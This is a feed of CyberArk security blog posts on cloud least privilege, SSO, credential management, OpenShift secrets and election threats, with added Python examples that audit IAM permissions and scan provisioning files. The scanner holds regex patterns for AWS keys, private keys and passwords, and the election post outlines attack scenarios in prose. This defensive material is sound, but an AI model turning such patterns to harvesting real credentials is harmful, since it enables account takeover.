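            granted.update(expand(pattern))
    return granted


def unused_actions(policy, observed):
    """Granted but never exercised: the excess the audit should remove."""
    return sorted(granted_actions(policy) - set(observed))


def escalation_sensitive_unused(policy, observed):
    """Unused grants that would let an attacker mint new permissions; remove these first."""
    return sorted(a for a in unused_actions(policy, observed) if a in ESCALATION_SENSITIVE)


def least_privilege_policy(policy, observed):
    """Rewrite the policy to the intersection of granted and observed actions.

    Resource stays '*' here; scoping it to the buckets and instances actually
    touched is the next tightening step and needs resource-level usage data.
    """
    kept = sorted(granted_actions(policy) & set(observed))
    return {
        "Version": policy.get("Version", "2012-10-17"),
        "Statement": [{"Effect": "Allow", "Action": kept, "Resource": "*"}],
    }


if __name__ == "__main__":
    print("unused:", unused_actions(OVER_PERMISSIVE_POLICY, OBSERVED_ACTIONS))
    print("escalation-sensitive unused:",
          escalation_sensitive_unused(OVER_PERMISSIVE_POLICY, OBSERVED_ACTIONS))
    print(json.dumps(least_privilege_policy(OVER_PERMISSIVE_POLICY, OBSERVED_ACTIONS), indent=2))
```

On the constructed input, `s3:*` quietly granted delete rights on objects and buckets that the identity never used, and the stale `iam:PassRole` is exactly the kind of permission that lets a compromised identity reach beyond its job: trimming it closes the escalation route before anything else is touched.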

Here are four reasons to introduce or extend least privilege to your cloud environments.  

1. Data Breaches Are Increasingly Linked to Cloud Identities

Digital transformation only moves forward. As businesses shift their attention to the cloud, so do attackers. But while attackers are targeting new environments, they rely on the same old tactics. The 2020 Verizon Data Breach Investigations Report (DBIR) found that identities remain the weakest link in most organizations: credential theft was employed in 77% of cloud breaches.

These trends reinforce the case for least privilege access in cloud environments. In a least privilege model, organizations proactively protect themselves from insider threats while greatly limiting the potential damage of external attacks. A compromised identity in a least privilege framework can’t immediately access resources outside of that identity’s standard job responsibilities. Least privilege, therefore, limits attacker movement and protects mission-critical workloads, buying valuable time to detect and respond to an attack.

2. Accelerated Cloud Adoption Expands the Attack Surface. Least Privilege Shrinks It.

More cloud services. More identities. More risk. Several aspects of cloud environments make proper configuration of privileges and permissions a challenge. Some organizations grant cloud IAM roles for application services a wide range of permissions to limit developer friction; a thorough entitlements audit would identify such excessive permissions and trim the role to the least privilege the service needs to work properly. Others fail to account for outdated permissions, such as failing to remove developer access to storage buckets and container pods at the close of a project.
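The entitlements audit mentioned above, as an added worked example (this is not CyberArk code and not a cloud provider API): it expands a policy's wildcard grants against a constructed action catalogue, subtracts the actions that usage logs show the identity actually calling over the review window, and reports the remainder as least-privilege candidates, with a separate list of the ones that deserve immediate attention. `KNOWN_ACTIONS`, `HIGH_RISK_PREFIXES`, `SAMPLE_POLICY`, `SAMPLE_USED` and the example bucket ARN are all constructed assumptions; a real audit would expand wildcards against the provider's published action list and read usage from the provider's audit trail.

```python
"""Excess-permission audit: compare what an IAM-style policy grants with what the
identity actually used. Added example, not CyberArk code; the action catalogue,
policy and usage list are constructed."""
from fnmatch import fnmatchcase

# Constructed stand-in for the provider's full action list. A real audit expands
# wildcards against the provider's published action catalogue instead.
KNOWN_ACTIONS = [
    "s3:GetObject", "s3:PutObject", "s3:DeleteObject", "s3:ListBucket",
    "s3:DeleteBucket",
    "ec2:DescribeInstances", "ec2:RunInstances", "ec2:TerminateInstances",
    "iam:CreateUser", "iam:AttachUserPolicy", "iam:PassRole",
]

# Unused actions with these prefixes are the first ones to remove (constructed list).
HIGH_RISK_PREFIXES = ("iam:", "s3:Delete", "ec2:Terminate")


def expand_actions(patterns):
    """Expand wildcard patterns such as 's3:*' or 'ec2:Describe*' to concrete actions."""
    expanded = set()
    for pat in patterns:
        expanded.update(a for a in KNOWN_ACTIONS if fnmatchcase(a, pat))
    return expanded


def granted_actions(policy):
    """Collect every action the Allow statements grant, minus explicit Denies.
    NotAction statements are not modelled and are raised for manual review."""
    allowed, denied = set(), set()
    for stmt in policy.get("Statement", []):
        if "NotAction" in stmt:
            raise ValueError("NotAction statements need manual review")
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        target = allowed if stmt.get("Effect") == "Allow" else denied
        target.update(expand_actions(actions))
    return allowed - denied


def audit(policy, used_actions):
    """Return (unused, missing). Granted-but-unused actions are candidates for
    removal; used-but-not-granted actions mean the usage data is stale or a
    second policy is also in play and needs its own review."""
    granted = granted_actions(policy)
    used = set(used_actions)
    return sorted(granted - used), sorted(used - granted)


def high_risk(unused):
    """Subset of unused actions that can delete data or change who has access."""
    return [a for a in unused if a.startswith(HIGH_RISK_PREFIXES)]


def right_sized_policy(used_actions, resource):
    """Proposed replacement that lists only observed actions. Narrowing
    'Resource' to specific ARNs is the next tightening step after this one."""
    return {"Version": "2012-10-17",
            "Statement": [{"Effect": "Allow",
                           "Action": sorted(set(used_actions)),
                           "Resource": resource}]}


# Constructed inputs: a broad role policy and the actions the audit trail showed
# the role actually calling during the review window.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "ec2:Describe*"], "Resource": "*"},
        {"Effect": "Deny", "Action": "s3:DeleteBucket", "Resource": "*"},
    ],
}
SAMPLE_USED = ["s3:GetObject", "s3:ListBucket", "ec2:DescribeInstances"]

if __name__ == "__main__":
    unused, missing = audit(SAMPLE_POLICY, SAMPLE_USED)
    print("unused:", unused)                      # ['s3:DeleteObject', 's3:PutObject']
    print("high-risk unused:", high_risk(unused))  # ['s3:DeleteObject']
    print("missing:", missing)                    # []
    # The ARN below is a constructed placeholder, not a real bucket.
    print("proposal:", right_sized_policy(SAMPLE_USED, "arn:aws:s3:::example-bucket/*"))
```

The usage window matters: an action that a quarterly job needs will look unused in a one-month sample, which is why the proposal is reviewed with the role's owner rather than applied automatically, and why the `missing` list is worth checking before trusting the `unused` one.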

Both scenarios are equally dangerous, as an attacker compromising either of these identities can increase their chances of escalating privileges or reaching mission-critical data undetected. Establishing and continuously validating least privilege is a critical step to shrinking the attack surface, lowering risk by dissuading insider threat actors, and impeding external attackers.

3. Cloud Services Are Multiplying. So Are Misconfiguration Risks.

The leading infrastructure as a service (IaaS) platforms – Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP) – are constantly introducing new services to differentiate from other platforms. This blistering innovation boosts business productivity, as powerful tools for specialized needs like data streaming, blockchain networking and Internet of Things (IoT) analytics are more accessible than ever before.

But that accessibility can come at a price. Configuration of cloud services is challenging for any organization, and one simple misconfiguration can open doors for attackers. The 2020 IBM Cost of a Data Breach report found attackers used cloud misconfigurations in nearly 20% of data breaches.

Least privilege models place emphasis on managing permissions to identify potential misconfigurations that result in excessive, unauthorized access to key cloud services, mitigating risk while enabling necessary access to advanced workloads.

4. Cloud Provider, Industry and Regulatory Frameworks Recommend Least Privilege

Recognizing the dangers of over-permissioned identities and the difficulty of securely configuring services in immense cloud environments, AWS, Azure, and GCP all specify least privilege access as a security best practice.

Industry consortia such as the Cloud Security Alliance, through its Cloud Controls Matrix, also stress the importance of continuously reviewing permissions. Meanwhile, highly regulated organizations can even face financial penalties if they are breached after failing to establish least privilege. Organizations should continuously verify least privilege across their on-premises and cloud workloads to ensure compliance.

Least privilege is recognized as a security best practice for a reason. But it cannot come at the expense of end-user productivity or overburden IT teams. Effective least privilege enforcement brings the right mix of privileged access management practices together with flexible controls to balance security and compliance requirements with operational and end-user needs.

Implement Least Privilege Across Your Cloud Estate

Born out of CyberArk Labs, CyberArk Cloud Entitlements Manager provides cloud-agnostic visibility and granular, AI-powered remediation of excessive permissions, so organizations can consistently implement least privilege while preserving necessary access to drive operational efficiency.

We’re proud of the solution’s user experience, too; in under one hour, CyberArk Cloud Entitlements Manager can take customers from subscription to AI-powered remediation, while calculating exposure-level analysis for all identities, environments and platforms in an organization’s AWS, Azure, GCP and AWS Elastic Kubernetes Services environments.

Discover how our latest innovation empowers organizations to operate cloud services securely and efficiently. Join our virtual launch event for demonstrations and a free trial opportunity, and hear from CyberArk customers and executives.

*ESG eBook, Trends in IAM: Cloud-driven Identities, October 2020

]]>
Four Reasons to Strengthen Identity Security with SSO https://www.cyberark.com/blog/four-reasons-to-strengthen-identity-security-with-sso/ Tue, 03 Nov 2020 16:28:43 +0000 https://www.cyberark.com/?p=104356 Strengthen Identity Security with SSO

While it’s widely accepted that the “perimeter is dead,” current realities are forcing many organizations to evolve their security approaches faster than planned.

Traditional firewall and VPN-based security models simply weren’t built to protect the highly distributed IT environments of today. As organizations adopt cloud and hybrid infrastructure, embrace an increasing number and variety of SaaS applications, and encourage employees to work remotely, it’s clear that identity really is the only true perimeter. Effective enterprise security today hinges on the ability to securely manage and authenticate identities and control privileged access for every human, application, and machine – whether they’re within or outside of the network perimeter.  In today’s environment, all identities can become privileged under certain conditions, based on the systems, environments, applications, or data they’re accessing, or the types of operations they’re performing.

The Problem with Passwords

With this as a backdrop, it’s not surprising that cyber criminals target privileged user credentials above all else – based on the tremendous access they can provide to an organization’s most critical data and infrastructure. According to the 2020 Verizon DBIR, more than 80% of data breaches tied to hacking involve the use of lost or stolen credentials or brute force. With compromised privileged credentials, attackers can access internal resources, obtain confidential data and disrupt the business. Yet many organizations continue to rely on passwords to secure user credentials. This is a problem for numerous reasons.

There are over 300 million fraudulent sign-in attempts to Microsoft Services each day, and yet, 53% of users haven’t changed their passwords in the last 12 months. Even if they have, chances are good the new password is weak or used in multiple places. According to a Google study, 52% of people use the same password for multiple accounts.

Of course, many organizations have taken measures to secure identities, such as mandating unique passwords, requiring frequent password changes and enforcing password complexity policies. However, these controls can actually do more harm than good, by driving end-users to adopt risky password practices (like writing them down!) and putting unnecessary burden on IT teams charged with manually managing access.

Remembering, forgetting, entering and resetting passwords is a giant pain and a productivity suck, especially in the era of remote work, where employees and third-party vendors rely heavily on applications to collaborate and access corporate resources. Today’s typical employee loses about 12.6 minutes per week entering and resetting their passwords. A PwC study found about 30% of all help desk calls are related to passwords, which pulls valuable IT resources away from more strategic initiatives. Some simple calculations put the productivity cost of using passwords at approximately $725 per employee per year.

Four Reasons to Add SSO to Your Security Toolkit Today

Single sign-on (SSO) solves this pervasive password problem and shrinks the attack surface by enabling organizations to:

1. Consistently enforce stronger password policies and reduce the risk of poor password practices by eliminating the need for individual passwords altogether. With SSO, organizations can utilize a single secure identity for all applications, endpoints and resources.

2. Enhance the end-user experience by enabling one-click access to assigned cloud and on-premises applications for both local and remote users. To help keep workers productive and moving at the speed of business, some SSO solutions only require additional security controls for high-risk, privileged access requests.

3. Break down silos and simplify the management of users and accounts with seamless directory integrations.

4. Gain comprehensive visibility into users’ access activity – helping to meet compliance requirements around access, ease reporting and improve overall security posture.

Not All SSO Solutions Are Created Equal

The immediate benefits of SSO are clear: by bolstering Identity Security controls, organizations can reduce risk, enhance user experiences and simplify access to corporate resources, all while easing the burden on IT.

However, there are many additional, long-term benefits organizations can realize by implementing SSO solutions that are frequently overlooked during initial discussions. For example, with properly configured self-service tools, companies can significantly reduce their IT costs by reducing the number of password-related help desk tickets and calls. In addition, SSO can eliminate the possibility of accounts that remain active when employees change roles or leave the company. The right SSO solutions can even extend security capabilities beyond passwords to include multi-factor authentication (MFA) and passwordless authentication methods.

Join our on-demand webinar, “The Extended Benefits of Single Sign-On Solutions,” to explore the benefits of modern SSO and key considerations to help you to select the best solution for your organization.


]]>
Cybersecurity Horror Stories That Make Us Scream with Fright https://www.cyberark.com/blog/cybersecurity-horror-stories-that-make-us-scream-with-fright/ Fri, 30 Oct 2020 14:43:40 +0000 https://www.cyberark.com/?p=104112 Cybersecurity Horror Stories

Editor’s Note: The digital world can be a scary place. Whether lurking in the shadows of the dark web or hiding in plain sight, cyber spooks are out to trick and terrify you, with no treats in sight. It’s no coincidence that National Cybersecurity Awareness Month and Halloween share a spot on the calendar.

In the spirit of the season, we sat down with Bryan Murphy, director of consulting services at CyberArk, and leader of our remediation services team. With more than 20 years of cybersecurity experience*, Bryan has seen or read about nearly every ghoulish threat and dastardly data breach imaginable. Here, he describes some of the stories, trends, and risky practices that keep him up at night. Read on… if you dare.

Cringe-worthy Passwords

I once worked on a large-scale server build project. The team was using a default password, which I guessed – without even meaning to – while describing an example login scenario. Beware, a company-related acronym or stock symbol plus “123” does not make for a strong password. If you think adding a simple exclamation point at the end will save your administrative accounts and servers from impending doom, think again. And remember, resurrecting the ghosts of passwords past for reuse, or using the same ones across multiple systems will surely come back to haunt you.

A Perfect Cybersecurity Storm Is Brewing

Last spring, many people thought that cutting out commutes and working from home would give them more time to focus on other endeavors – like family, friends, hobbies, even exercise. Reality quickly sunk in as schools closed, responsibilities shifted or increased, and in many ways, life got even more hectic than before. As the FBI reported a 400% spike in cyber attacks, including targeted hits on remote access tools, corporate security boundaries relaxed and employees adopted risky habits in the name of efficiency and productivity. Today, workers are multi-tasking like never before – they can shop online, homeschool their kids, and do domain administrative work on corporate systems – all from the same device. It’s like watching every scary movie cliché at once. What could possibly go wrong?

The Masked Insider Threat

It’s hard to spot a malicious insider in your midst, and even harder when it’s an outsider masquerading as a legitimate employee. Consider the recent Twitter attack, where a motivated external attacker used compromised insider access to gain powerful levels of system access to execute a financially motivated social engineering scheme. Incidents like this remind us that trust is not a security policy and that devils often hide behind angel costumes. Strong privileged access controls cannot be an afterthought. Embed them into your design process from the start – be sure to actively monitor access – and stop spending your days looking over your shoulder.

When Nightmares Become Reality

Increasing attacks on critical infrastructure have the potential to paralyze entire cities or weaponize connected systems. Crippling ransomware attacks are forcing healthcare organizations to make impossible life-or-death decisions. This fall, a German hospital was hit by a ransomware attack. The resulting outage forced a woman with a life-threatening condition to travel to an alternate facility about 20 miles away. She died after a significant delay in treatment. I’ve been asked, “What do we do first? Bring back our servers or get the lights on in surgery?” Just this week, several federal agencies warned hospitals about “credible” information “of an increased and imminent cybersecurity threat to U.S. hospitals and healthcare providers” while COVID-19 cases and hospitalizations surge around the country.

No organization today can outrun the bogeyman. There is no silver bullet. Fortunately, many of the risks we face can be vanquished by staying vigilant and following fundamental security best practices like patching software, securing privileged credentials and identities, enforcing the principle of least privilege and backing up data. Remember, cybersecurity is a journey, not a final destination, and you don’t need to go it alone.

Stay safe out there and keep fighting the good fight. Happy Halloween.

*Note that these experiences are personal anecdotes and reflective of examples gathered throughout Bryan’s career and are not limited to his work at CyberArk.

]]>
Best Practices for Protecting Your Organization’s Dynamic Cloud Infrastructure https://www.cyberark.com/blog/best-practices-for-protecting-your-organizations-dynamic-cloud-infrastructure/ Thu, 29 Oct 2020 14:25:11 +0000 https://www.cyberark.com/?p=104098 Protecting Your Cloud Infrastructure

Editor’s Note: This is part two of a blog series on securing privileged access and identities in the cloud. Read part one on securing the root-level account and cloud management console.

A major benefit of cloud-based infrastructure is that new virtual machines (VMs), storage, containers and more can be provisioned dynamically as needed. This allows organizations to use cloud resources flexibly based on evolving demands, scaling up when needs surge and scaling down when needs decrease.

Every time a virtual machine or infrastructure resource is dynamically initiated and launched, it is assigned privileged credentials, such as SSH keys. This provisioning process doesn’t necessarily happen automatically. Rather, administrators may use the management console to spin up new VMs and assign the appropriate privileged credentials. No matter the nature of your cloud infrastructure today, protecting these powerful privileged credentials from the moment they’re created and throughout their lifecycle is essential.

Here are five best practices to follow as your cloud infrastructure evolves:

1. Discover all privileged entities with infrastructure access. Manually tracking and securing privileged accounts becomes increasingly difficult as your environment scales and becomes more dynamic. Privileged credentials are created – in fact need to be created – at high velocity, making it difficult for humans to manage. Automation, scripts and cloud management tools make such provisioning possible, but also make credentials hard to manage and track. To better understand your privilege-related risk landscape, take advantage of tools that enable continuous discovery of all privileged credentials, including SSH keys, passwords, password hashes, AWS access keys, and more.

2. Employ a secure, centralized repository for all privileged credentials. By leveraging strongly authenticated APIs, robust integrations, and secret injection to securely retrieve and regularly rotate SSH keys and other credentials from a secure digital vault, your organization can automatically secure credentials as they are created – at the speed the cloud requires.

3. Automatically onboard new entities and immediately secure privileged credentials associated with newly provisioned infrastructure. Once you’ve discovered all existing privileged accounts and credentials in your cloud infrastructure, consider programmatic management for new privileged entities via onboarding APIs to dramatically streamline management and improve operational efficiency.

This step is particularly important in the cloud as infrastructure is automated and containers, servers and other resources are provisioned and used for just minutes or hours to complete a specific task. This happens numerous times each day without any human interaction. Auto-scaling in the cloud means VMs and resources are kicked into gear programmatically. To effectively secure privileged access, SSH keys used to access VMs programmatically must be automatically onboarded and secured with vaulting and rotation as new cloud instances are spun up.

4. Manage the infrastructure credentials using just-in-time privileged access management. Organizations just getting started with the cloud may choose to grant access to medium- to long-term VMs via traditional standing access with privileged credentials that are vaulted and rotated. This is an important first step, as it allows organizations to quickly bolster cloud infrastructure security.

As organizations progress on their cloud journey, infrastructure scales faster and is spun up and down in seconds based on needs. This requires a different, more dynamic approach to privileged access management. Just-in-time access grants users (human, machine or application) elevated access to sensitive resources for a specific amount of time in order to perform a necessary task.

In other words, it gives the right user the right access to the right cloud resource at the right time (and only as long as it’s required) for the right reasons. Together with privileged session monitoring capabilities, just-in-time access helps strengthen access controls to protect cloud VMs.

5. Automatically remove privileges when the infrastructure is de-provisioned. The ability to remove privileged access quickly, and with precision, is critical to reducing risk. Automating this process will streamline internal IT operations and improve outcomes.
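The five practices above, carried through as one added example that is not part of the original post or of any CyberArk product: a regex-based discovery pass over constructed provisioning artifacts (practice 1), a toy central vault that onboards what was found (practices 2 and 3), hands out time-boxed leases bound to a single principal (practice 4), and revokes every lease on a secret when the resource is de-provisioned (practice 5). The `Vault` class, `PATTERNS`, `SAMPLE_ARTIFACTS` and every name and value in them are constructed; `AKIAIOSFODNN7EXAMPLE` is the documentation placeholder key id, not a live key.

```python
"""Credential discovery plus just-in-time leasing with revocation on
de-provisioning. Added example, not CyberArk product code: the vault, lease
model, detection patterns and sample artifacts are all constructed."""
import re
import time

# Textual patterns for common embedded credentials (constructed; a production
# scanner would also use entropy checks and each provider's exact key formats).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*\S+"),
}


def discover(artifacts):
    """Scan {path: text} provisioning artifacts (user-data scripts, config files,
    key files). Returns (path, line_no, kind) tuples and never the secret value."""
    findings = []
    for path, text in artifacts.items():
        for line_no, line in enumerate(text.splitlines(), 1):
            for kind, rx in PATTERNS.items():
                if rx.search(line):
                    findings.append((path, line_no, kind))
    return findings


class Vault:
    """Central secret store that issues short-lived leases tied to one principal."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock      # injectable so expiry can be tested deterministically
        self._secrets = {}       # name -> secret value
        self._leases = {}        # lease_id -> (name, principal, expires_at)
        self._counter = 0
        self.audit_log = []      # every grant, checkout, denial and revocation

    def onboard(self, name, secret):
        self._secrets[name] = secret
        self.audit_log.append(("onboard", name))

    def lease(self, name, principal, ttl_seconds):
        """Grant `principal` time-boxed access to secret `name`; returns a lease id."""
        if name not in self._secrets:
            raise KeyError(f"no such secret: {name}")
        self._counter += 1
        lease_id = f"lease-{self._counter}"
        self._leases[lease_id] = (name, principal, self._clock() + ttl_seconds)
        self.audit_log.append(("lease", name, principal, lease_id))
        return lease_id

    def checkout(self, lease_id, principal):
        """Release the secret only to the lease holder and only before expiry."""
        entry = self._leases.get(lease_id)
        if entry is None or entry[1] != principal or self._clock() >= entry[2]:
            self.audit_log.append(("denied", lease_id, principal))
            raise PermissionError(f"lease {lease_id} is not valid for {principal}")
        self.audit_log.append(("checkout", lease_id, principal))
        return self._secrets[entry[0]]

    def deprovision(self, name):
        """Resource torn down: drop the secret and revoke every lease on it."""
        self._secrets.pop(name, None)
        revoked = [lid for lid, (n, _, _) in self._leases.items() if n == name]
        for lid in revoked:
            del self._leases[lid]
        self.audit_log.append(("deprovision", name, len(revoked)))
        return len(revoked)


# Constructed artifacts; none of these values are real credentials.
SAMPLE_ARTIFACTS = {
    "user-data.sh": "#!/bin/sh\nexport AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n",
    "app/db.conf": "host = db.internal\npassword = constructed-example-pw\n",
    "keys/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed placeholder)\n"
                   "-----END OPENSSH PRIVATE KEY-----\n",
}


def demo():
    """Run the whole lifecycle once; returns (findings, number of leases revoked)."""
    findings = discover(SAMPLE_ARTIFACTS)                                # practice 1
    vault = Vault()
    vault.onboard("db-admin", "constructed-example-pw")                  # practices 2, 3
    lease_id = vault.lease("db-admin", "deploy-job-42", ttl_seconds=300)  # practice 4
    vault.checkout(lease_id, "deploy-job-42")
    revoked = vault.deprovision("db-admin")                              # practice 5
    return findings, revoked


if __name__ == "__main__":
    print(demo())
```

Two design points carry over to a real deployment: `discover` reports locations and kinds but never copies the secret value into its output, so the scanner's own log does not become a new place where credentials live; and `deprovision` counts and logs the leases it revokes, which is the evidence an auditor asks for when checking that access ended with the resource.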

Cloud Infrastructure Access is an Evolving Journey

Cloud infrastructure environments are not static; your cloud security approach shouldn’t be either. If you’re looking for tips along the way, check out our eBook, “Securing Privileged Access and Identities In 4 Key Cloud Scenarios” and our cloud security resources. Stop back soon to explore part three of our series on securing cloud-native applications and the DevOps pipeline.

]]>
Ramp Up Container Security With Red Hat OpenShift and CyberArk https://www.cyberark.com/blog/ramp-up-container-security-with-red-hat-openshift-and-cyberark/ Thu, 22 Oct 2020 20:20:24 +0000 https://www.cyberark.com/?p=104002

Microservices and containerized approaches are becoming increasingly critical elements of digital transformation strategies. Container platforms offer developers and operations teams a simplified way to build and deploy better applications faster across hybrid cloud environments, and at scale. In fact, a recent Capital One study shows 86% of technology leaders have prioritized container usage for more applications, largely to improve collaboration between developers and operations (50%) and enhance the developer experience (46%).

Red Hat® OpenShift® is one of the leading container platforms, providing enterprises with a consistent foundation and set of services for building and scaling containerized applications across hybrid environments. OpenShift leverages the underlying capabilities of the popular open source container orchestration platform, Kubernetes (K8s).

Today, several thousand enterprises use OpenShift to migrate application workloads to the cloud, as well as develop cloud-native applications using DevOps methodologies at scale. All of these applications use credentials, or secrets, to access databases and other sensitive resources – credentials that must be managed and secured the same way human access is. However, in a typical enterprise compute environment, OpenShift is likely just one of several platforms being used. This means credentials must be shared across multiple IT platforms, CI/CD tools, as well as cloud and hybrid environments. If these credentials are exposed, attackers can use them to escalate access and privilege, reach critical assets and cause significant harm – from exfiltrating or maliciously destroying sensitive data to crypto-jacking cloud resources.

Many development platforms and tools have their own native, or built-in, security components that manage credentials and access, and may even offer some form of audit support. Yet typically these security mechanisms don’t securely share secrets with other tools, instead creating isolated “islands of security” that make it difficult to consistently manage privileged credentials across the organization. To eliminate these disparate security islands and mitigate the risk of data breaches, all privileged credentials should be centrally managed, rotated, monitored and audited across the enterprise’s entire development and operations environment.

The CyberArk Secrets Management solution is designed to do just that. It provides a comprehensive, centralized solution for securing credentials and secrets for applications, containers and CI/CD tools across native cloud and DevOps environments. CyberArk Conjur, our open source secrets management tool, complements this enterprise offering.

Simplify Securing OpenShift Containers with Out-of-the-Box Integrations

Through several powerful integrations, CyberArk and Red Hat provide ways to simplify and strengthen container security by safeguarding the credentials used by applications running in OpenShift containers.

CyberArk Application Access Manager integrations with Red Hat OpenShift offer major benefits for cross-functional teams, including:

  • Development: Simplifies how developers write code to use credentials to securely access databases and other sensitive resources with flexible APIs. Code running in OpenShift containers can seamlessly access – and use – the required credentials, which are centrally managed and secured by CyberArk.
  • Operations: Automatically secures and rotates secrets used by OpenShift containers based on the organization’s policies managed by the CyberArk platform. This eliminates the need for operations to manually change, populate and provide audit trails for credentials used by containers.
  • Security: Separates duties so that each container-based application has access only to the credentials or secrets it needs to reach the specific resources it is authorized to access. Policy-based access controls are set by the organization’s security team and managed by the CyberArk platform.

Together, CyberArk and Red Hat can help eliminate security islands and siloed credentials, enabling developers and operations teams to more easily and securely deploy applications at scale.

Secretless Broker Further Improves Container Security and Simplifies How Developers Write Code

CyberArk Application Access Manager provides OpenShift developers with flexible APIs, including environment variables and REST APIs. Each supported method is designed to secure secrets for databases and other sensitive resources, helping developers stay focused on developing code and moving fast.

Developers looking for an alternative to APIs can take advantage of Secretless Broker, a feature within CyberArk Application Access Manager and CyberArk Conjur. With Secretless Broker, applications can securely connect to databases, services and other protected resources – without ever accessing or even knowing the credential.

When an application needs to securely access a resource, it simply makes a local connection request to Secretless Broker. Secretless Broker then automatically authenticates the app using the native characteristics of the OpenShift container and establishes a connection to the database or other resource. This approach reduces the attack surface by preventing credentials from being exposed to applications. After all, applications cannot leak credentials that they don’t have access to. This also provides a simpler way for developers to write code to securely access databases.

3 Ways to Get Started with CyberArk and OpenShift: Webinar, Workshop and Resource Library

Join Red Hat and CyberArk for a live webinar, “Modernize DevOps with CyberArk Secrets Management and Red Hat OpenShift,” on Tuesday, November 10, 2020 at 1:00 pm EST. Attendees will explore lessons learned from recent breaches involving DevOps environments and the implications for containerized apps, key benefits of enhancing platform-specific secrets management capabilities with a centralized approach, and practical steps to take that strengthen container security without impacting developer velocity.

Register here to reserve your spot. For a deeper dive, webinar attendees can join an interactive, hands-on technical workshop hosted by Red Hat and CyberArk on December 10, 2020. For details, reach out to sales@cyberark.com or your CyberArk contact.

To learn more about securing your OpenShift environments with CyberArk and Red Hat, along with the CyberArk Secretless Broker feature, check out these resources:

]]>
Five Attack Scenarios That Could Alter the U.S. Election https://www.cyberark.com/blog/five-attack-scenarios-that-could-alter-the-u-s-election/ Thu, 22 Oct 2020 14:37:20 +0000 https://www.cyberark.com/?p=103981

On October 21, the FBI held a press conference alerting U.S. citizens about new details concerning nation-state interference with the upcoming U.S. elections. According to news reports, attackers have gained access to stolen voter registration data and are using it to confuse and even potentially intimidate voters. Director of National Intelligence, John Ratcliffe said, “This data can be used by foreign actors to attempt to communicate false information to registered voters that they hope will cause confusion, sow chaos, and undermine your confidence in American democracy.” These are serious charges.

If we learned anything from 2016, it’s that nation-states, criminal organizations, and other malicious actors view infiltrating and disrupting elections as a brass ring and are continually looking for ways to make their mark. The recent U.S. indictment of one nation-state group shows the disruption these groups can cause.

The cyber attacks of the last presidential election primarily manifested in the form of disinformation campaigns. But as we’re already seeing, in 2020, the goal of disruption and chaos will play out with greater intensity — and it will last well after Nov. 3. In addition, the continued lack of consistent regulations guiding voting and security across States, counties, towns, and even local polling precincts is exacerbating this issue.

The CyberArk Labs team has been closely monitoring the events leading up to the U.S. election. Based on analysis of ongoing attack techniques and the inherent vulnerabilities in government and voting infrastructure, here are five ways we think attackers could seek to disrupt this year’s election, both directly and indirectly.

1. Social Engineering on the Rise

According to the Verizon Data Breach Investigations Report, social engineering attacks are increasing year-over-year and more than 80% of all data breaches tied to hacking involve the theft and use of stolen credentials.

Attackers use social engineering attacks to target individuals in hopes of stealing their credentialed access to systems and data. The recent Twitter breach was a prime example of this: attackers targeted a small set of employees with a coordinated social engineering campaign which resulted in stolen credentials being used to gain unauthorized access to an administrative tool that led to the compromise of high-profile accounts. This included the Democratic presidential nominee, Joe Biden.

While attackers will certainly be looking to infiltrate those close to each party, the threat goes much farther than a campaign team or the nominee themselves. State and local governments that are charged with holding and protecting elections will also be attractive targets. It only takes one compromised account for an attacker to potentially breach an organization’s entire infrastructure.

2. Targeting Volunteers and Campaign Staff to Become Privileged Insiders

Identity-centric attacks will most likely be used on election volunteers, including polling staff.  While campaign staff are always targets, you don’t need to breach a John Podesta to damage a campaign. Every staffer, every volunteer and every contractor connected to the campaign has the potential to become a privileged insider based on the data or applications they have access to.

Attackers know this and will look to exploit this privileged status – targeting these individuals with social engineering attacks to steal their insider access. With this level of access, attackers can exfiltrate ‘compromising’ material and information, use their status to disseminate disinformation across trusted channels like social media and email, or even lock down campaign operations through targeted malware and ransomware attacks.

The same concept applies to the estimated 460,000 or more poll worker volunteers expected at precincts across the country this year. While volunteers do not necessarily have access to election infrastructure itself, they are likely provided access to the networks at polling places for their phones, laptops, and other devices. Targeting a volunteer’s personal device could provide an easy backdoor for attackers to infiltrate the network, elevate privileges and move laterally into a network to launch a ransomware or similar attack on a polling precinct. This massive drive for poll volunteers is also ripe for a bevy of online scams and fraud activity. Anyone signing up for volunteer status should only do so through reputable sources.

3. Targeted Attacks on Critical Infrastructure to Cause Chaos Pre- and Post-Election

Atlanta. Baltimore. New Orleans. Three U.S. cities that had civic operations ground to a halt in the last year due to massive ransomware attacks. A coordinated attack of this nature timed for election day could cause widespread chaos – from shutting down public transportation and making it harder for voters to get to the polls, to crashing phone systems to prevent voters from asking questions or volunteers from reporting results. Targeted attacks of this nature, focused on battleground states, might suppress critical votes that could change the very outcome of the election.

Post-election scenarios are grim as well. Targeted attacks on state and local agencies overseeing the election may postpone result totals from being reported, or worse, from being trusted. Given the contentious nature of this year’s election, attacks on critical infrastructure like the energy grid or water treatment facilities could amplify social unrest and further cause chaos during the transition period.

4. U.S. Election Databases

The myriad problems with election infrastructure are well known. Last year, it was disclosed that attackers had breached election databases in two Florida counties in 2016. The attackers used a typical phishing approach to trick unsuspecting workers and steal the credentials that gave them access to the networks.

Voter registration databases that hold state-wide voter records are attractive targets. Because they are typically connected to networks to facilitate record sharing, attackers might look to infiltrate them and manipulate the data they hold. Threat actors could then perform simple actions like changing registration information in targeted districts to make it more difficult for people to vote.

And while absentee, mail-in ballots are broadly considered secure, the push to allow for broader mail-in voting opens up new possibilities for malfeasance. Changing voter information may alter where eligible ballots are delivered, delay delivery or otherwise impede the process.

5. New Types of Disinformation Campaigns Emerge

The social media-based disinformation campaigns of 2016 were well documented and are expected to intensify as we get closer to the vote in 2020. These tactics could be amplified by targeting trusted sources – like prominent politicians or news personalities, the candidates themselves or their staff, or even local politicians and elected officials – to push propaganda.

